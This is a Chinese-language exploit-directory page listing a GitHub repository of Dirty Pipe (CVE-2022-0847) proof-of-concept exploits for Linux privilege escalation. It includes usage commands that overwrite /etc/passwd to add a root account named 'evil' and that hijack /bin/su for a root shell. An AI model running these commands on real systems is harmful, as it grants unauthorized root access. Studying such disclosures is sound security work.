Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Dirty-Pipe-CVE-2022-0847-POCs — CVE-2022-0847(Dirty Pipe)的概念验证漏洞利用,通过覆盖只读文件或SUID二进制文件,在Linux内核5.8+上实现本地权限提升。 | Kitploit
工具/GitHubGitHub/ajith737/dirty-pipe-cve-2022-0847-pocs
权限提升漏洞分析漏洞利用学习与教育二进制利用
GitHubajith737/dirty-pipe-cve-2022-0847-pocs

Dirty-Pipe-CVE-2022-0847-POCs

CVE-2022-0847(Dirty Pipe)的概念验证漏洞利用,通过覆盖只读文件或SUID二进制文件,在Linux内核5.8+上实现本地权限提升。

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
313年前尚未审核

Dirty-Pipe-CVE-2022-0847-POCs

  • 作者:Max Kellermann [email protected]
  • 贡献者:Bl4sty https://twitter.com/bl4sty 一个名为"Dirty Pipe"的新 Linux 漏洞允许本地用户通过公开可用的漏洞利用程序获取 root 权限。

今天,安全研究员 Max Kellermann 负责任地披露了"Dirty Pipe"漏洞,并声称它影响了 Linux Kernel 5.8 及更高版本,甚至包括 Android 设备。

该漏洞被追踪为 CVE-2022-0847,允许非特权用户在只读文件中注入和覆盖数据,包括以 root 身份运行的 SUID 进程。

Kellerman 在追踪导致他一位客户的 Web 服务器访问日志损坏的 bug 时发现了此缺陷。

随后 Bl4sty 编写了另一个版本。它不是覆盖诸如 /etc/passwd 之类的文件,而是覆盖用户指定的 SUID 二进制文件(如 /bin/su),注入 shellcode,然后以特权用户(即 root)权限执行。

漏洞利用 1

root@kitploit:~
┌──(ghost㉿uchiha)-[~]
└─$gcc PoC1.c -o exploit1 
┌──(ghost㉿uchiha)-[~]
└─$./exploit1 /etc/passwd 189 'evil:$6$USR$aNQSBWd3Bdn4Eo8ZaAjBBXW7M3CM7NnW3vX0Ulrei18dDifAiS0pB2iqCxVCK0nCKfRjdCSqgKHagkul6JEHT/:0:0::/root:/bin/bash
'

漏洞利用 2

root@kitploit:~
┌──(ghost㉿uchiha)-[~]
└─$gcc PoC2.c -o exploit2
┌──(ghost㉿uchiha)-[~]
└─$./exploit2 /bin/su

详细使用请参考:https://medium.com/@ajithcrajendran/cve-2022-0847-dirty-pipe-a5d68f422dcf

下载工具